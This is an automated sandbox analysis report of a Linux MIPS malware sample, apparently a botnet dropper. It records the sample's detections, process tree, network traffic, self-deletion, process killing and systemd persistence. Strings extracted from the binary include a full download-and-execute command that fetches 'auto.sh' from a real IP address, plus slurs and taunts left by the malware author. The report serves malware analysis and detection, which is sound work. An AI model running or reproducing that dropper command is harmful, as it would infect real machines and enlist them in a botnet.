Edit tour

Linux Analysis Report
mpsl.elf

Overview

General Information

Sample name:	mpsl.elf
Analysis ID:	1585038
MD5:	aa498d8b14dff7783d7f01d4d4c9f8e4
SHA1:	94f84785a89ce84f4977178eaf5524c05831832e
SHA256:	22633b8d957952975d5680571716b1c2e5b392516a7218a51f3221af2c71d33a
Tags:	elfuser-abuse_ch
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Sample deletes itself

Sample tries to kill multiple processes (SIGKILL)

Creates hidden files and/or directories

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to kill a process (SIGKILL)

Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1585038
Start date and time:	2025-01-07 01:08:25 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	mpsl.elf
Detection:	MAL
Classification:	mal64.spre.evad.linELF@0/4@84/0

Warnings

VT rate limit hit for: tcpdown.suF

Runtime Messages

Command:	/tmp/mpsl.elf
PID:	5502
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	made you my bitch
Standard Error:

Process Tree

system is lnxubuntu20

mpsl.elf (PID: 5502, Parent: 5428, MD5: 0d6f61f82cf2f781c6eb0661071d42d9) Arguments: /tmp/mpsl.elf

mpsl.elf New Fork (PID: 5504, Parent: 5502)

mpsl.elf New Fork (PID: 5506, Parent: 5504)

mpsl.elf New Fork (PID: 5507, Parent: 5504)

mpsl.elf New Fork (PID: 5512, Parent: 5507)

mpsl.elf New Fork (PID: 5510, Parent: 5504)

sh (PID: 5510, Parent: 5504, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload"

sh New Fork (PID: 5514, Parent: 5510)

systemctl (PID: 5514, Parent: 5510, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload

mpsl.elf New Fork (PID: 5518, Parent: 5504)

sh (PID: 5518, Parent: 5504, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable startup_command.service"

sh New Fork (PID: 5520, Parent: 5518)

systemctl (PID: 5520, Parent: 5518, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable startup_command.service

systemd New Fork (PID: 5516, Parent: 5515)

snapd-env-generator (PID: 5516, Parent: 5515, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

systemd New Fork (PID: 5524, Parent: 5523)

snapd-env-generator (PID: 5524, Parent: 5523, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

gnome-session-binary New Fork (PID: 5545, Parent: 1588)

sh (PID: 5545, Parent: 1588, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill

gsd-rfkill (PID: 5545, Parent: 1588, MD5: 88a16a3c0aba1759358c06215ecfb5cc) Arguments: /usr/libexec/gsd-rfkill

systemd New Fork (PID: 5550, Parent: 1)

systemd-hostnamed (PID: 5550, Parent: 1, MD5: 2cc8a5576629a2d5bd98e49a4b8bef65) Arguments: /lib/systemd/systemd-hostnamed

gdm3 New Fork (PID: 5681, Parent: 1400)

Default (PID: 5681, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

gdm3 New Fork (PID: 5682, Parent: 1400)

Default (PID: 5682, Parent: 1400, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /etc/gdm3/PrimeOff/Default

systemd New Fork (PID: 5687, Parent: 1)

systemd-user-runtime-dir (PID: 5687, Parent: 1, MD5: d55f4b0847f88131dbcfb07435178e54) Arguments: /lib/systemd/systemd-user-runtime-dir stop 127

cleanup

Yara Signatures

⊘No yara matches

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: mpsl.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: mpsl.elf	Virustotal: Detection: 53%			Perma Link
Source: mpsl.elf	ReversingLabs: Detection: 52%

Source: mpsl.elf	String: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe
Source: mpsl.elf	String: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: mpsl.elf	String: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch
Source: startup_command.service.13.dr	String: ExecStart=cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh (null)

Source: global traffic	TCP traffic: 192.168.2.13:40146 -> 45.200.149.249:2601
Source: global traffic	TCP traffic: 192.168.2.13:45540 -> 45.200.149.95:2601
Source: global traffic	TCP traffic: 192.168.2.13:53064 -> 23.94.37.42:2601
Source: global traffic	TCP traffic: 192.168.2.13:55136 -> 23.94.242.130:2601
Source: global traffic	TCP traffic: 192.168.2.13:50408 -> 104.168.33.8:2601

Source: /tmp/mpsl.elf (PID: 5502)

Socket: 127.0.0.1:39123

Jump to behavior

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: tcpdown.su
Source: global traffic	DNS traffic detected: DNS query: tcpdown.suF

Source: startup_command.service.13.dr	String found in binary or memory: http://154.216.20.138/auto.sh
Source: mpsl.elf, startup_command.service.13.dr	String found in binary or memory: http://154.216.20.138/auto.sh;

System Summary

Sample tries to kill multiple processes (SIGKILL)

Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 727, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 914, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 917, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 1805, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 1884, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 2961, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 5506, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 5512, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 5545, result: successful	Jump to behavior

Source: Initial sample	String containing 'busybox' found: busybox
Source: Initial sample	String containing 'busybox' found: /proc//exe%s/%s/proc/%s/cmdlinerwgetcurlnetstatgreppsbusyboxlsmvechokillkillallbashrebootshutdownhaltiptablespowerofffaggot got malware'd/tmp/opt/home/dev/var/sbin/proc/self/exe
Source: Initial sample	String containing 'busybox' found: cd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s
Source: Initial sample	String containing 'busybox' found: /tmp/rc_local.tmpr+/usr/bin/systemctl/etc/init.dcd /tmp \|\| cd /var/run \|\| cd /mnt \|\| cd /root \|\| cd / \|\| cd /home; wget http://154.216.20.138/auto.sh \|\| busybox wget http://154.216.20.138/auto.sh \|\| curl -O http://154.216.20.138/auto.sh; chmod 777 auto.sh; ./auto.sh %s/dev/watchdog/dev/misc/watchdogmade you my bitch

Source: ELF static info symbol of initial sample

.symtab present: no

Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 727, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 914, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 917, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 936, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 1805, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 1884, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 2961, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 5506, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 5512, result: successful	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5507)	SIGKILL sent: pid: 5545, result: successful	Jump to behavior

Source: classification engine

Classification label: mal64.spre.evad.linELF@0/4@84/0

Source: /usr/libexec/gsd-rfkill (PID: 5545)	Directory: <invalid fd (9)>/..	Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 5545)	Directory: <invalid fd (8)>/..	Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5550)	Directory: <invalid fd (10)>/..	Jump to behavior

Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/230/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/110/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/231/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/232/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/112/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/233/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/113/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/234/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/114/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/235/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/115/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/236/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/116/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/237/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/117/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/238/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/118/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/239/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/119/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/3632/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/914/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/10/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/917/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/12/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/13/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/14/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/15/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/16/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/17/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/18/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/19/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/240/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/3095/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/120/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/241/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/121/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/242/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/1/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/122/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/243/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/2/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/123/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/244/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/3/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/124/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/245/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/1588/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/125/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/4/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/246/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/126/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/5/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/247/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/127/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/6/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/248/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/128/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/7/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/249/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/129/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/8/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/800/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/9/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/1906/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/802/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/803/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/20/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/21/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/23/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/24/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/25/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/26/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/27/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/28/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/29/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/3420/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/1482/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/490/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/1480/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/250/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/371/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/130/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/251/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/131/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/252/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/132/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/253/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/254/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/1238/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/134/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/255/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/256/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/257/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/378/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/3413/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/258/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/259/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/1475/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/936/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/30/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/816/cmdline	Jump to behavior
Source: /tmp/mpsl.elf (PID: 5502)	File opened: /proc/35/cmdline	Jump to behavior

Source: /tmp/mpsl.elf (PID: 5510)	Shell command executed: sh -c "systemctl daemon-reload"			Jump to behavior
Source: /tmp/mpsl.elf (PID: 5518)	Shell command executed: sh -c "systemctl enable startup_command.service"			Jump to behavior

Source: /bin/sh (PID: 5514)	Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload			Jump to behavior
Source: /bin/sh (PID: 5520)	Systemctl executable: /usr/bin/systemctl -> systemctl enable startup_command.service			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/mpsl.elf (PID: 5502)

File: /tmp/mpsl.elf

Jump to behavior

Source: /tmp/mpsl.elf (PID: 5502)	Queries kernel information via 'uname':			Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 5550)	Queries kernel information via 'uname':			Jump to behavior

Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: Uu-binfmt/mipsel/var/lib/vmware
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: u-binfmt/mipsel/var/lib/vmware/VGAuth/aliasStore
Source: mpsl.elf, 5502.1.000055c421f57000.000055c421ffe000.rw-.sdmp, mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp, mpsl.elf, 5512.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/mipsel
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.Nyhh0c\
Source: mpsl.elf, 5512.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: !/sbin/irqbalance!/sbin/mount.vmhgfs1
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmp	Binary or memory string: vmwareD
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5506.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5512.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXX
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.Nyhh0c
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: /var/lib/vmware
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: /tmp/vmware-root_727-4290690966
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: !/var/lib/vmware/VGAuthQ
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: Uu-binfmt/mipsel/var/lib/vmware/VGAuth/aliasStore!/var/lib/PackageKitQ
Source: mpsl.elf, 5502.1.000055c421f57000.000055c421ffe000.rw-.sdmp, mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp, mpsl.elf, 5512.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: U!/etc/qemu-binfmt/mipsel
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: U/mipsel/1/tmp/vmware-root_727-42906909660!/proc/5486/cmdline!`
Source: mpsl.elf, 5502.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5506.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp, mpsl.elf, 5512.1.00007fff52b59000.00007fff52b7a000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-mipsel/tmp/mpsl.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mpsl.elf
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth/aliasStore
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmp	Binary or memory string: /var/lib/boltd8/var/lib/vmware<
Source: mpsl.elf, 5506.1.00007f66a445b000.00007f66a446c000.rw-.sdmp	Binary or memory string: FP/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-colord.service-PB7Ovf$/tmp/vmware-root_727-4290690966P/tmp/systemd-private-fe424f1b0f85425093f40a37100b81c4-fwupd.service-KWckKg4/tmp/hsperfdata_root
Source: mpsl.elf, 5512.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: /sbin/mount.vmhgfs
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmp	Binary or memory string: vmware
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth4/var/lib/NetworkManagerx
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: Uu-binfmt/mipsel/var/lib/vmware/VGAuth1/var/lib/vmware/VGAuth/aliasStoreQ0
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: u-binfmt/mipsel/var/lib/vmware/VGAuth
Source: mpsl.elf, 5506.1.00007f66a446c000.00007f66a4476000.rw-.sdmp	Binary or memory string: F(/var/lib/vmware/VGAuth/aliasStoreF
Source: mpsl.elf, 5506.1.000055c421f57000.000055c421ffe000.rw-.sdmp	Binary or memory string: /var/lib/vmware/VGAuth
